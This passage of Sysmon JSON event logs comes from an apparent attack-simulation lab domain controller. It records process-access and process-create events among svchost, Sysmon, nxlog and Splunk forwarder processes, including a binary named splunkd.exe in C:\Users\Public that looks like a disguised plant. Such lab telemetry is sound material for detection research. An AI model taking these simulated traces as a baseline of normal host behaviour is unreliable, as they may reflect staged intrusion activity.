06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3823,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3824,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3825,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3826,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3827,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-00103FA30500}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-00103FA30500}","TargetProcessId":"4720","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3828,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.418\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.418","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3829,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.481\r\nSourceProcessGUID: {E2A3D6B1-1106-5F25-0000-00103FA30500}\r\nSourceProcessId: 4720\r\nSourceThreadId: 4760\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.481","SourceProcessGUID":"{E2A3D6B1-1106-5F25-0000-00103FA30500}","SourceProcessId":"4720","SourceThreadId":"4760","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3830,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.510\r\nProcessGuid: {E2A3D6B1-1106-5F25-0000-001026A60500}\r\nProcessId: 4920\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nParentProcessId: 3828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.510","ProcessGuid":"{E2A3D6B1-1106-5F25-0000-001026A60500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","ParentProcessId":"3828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
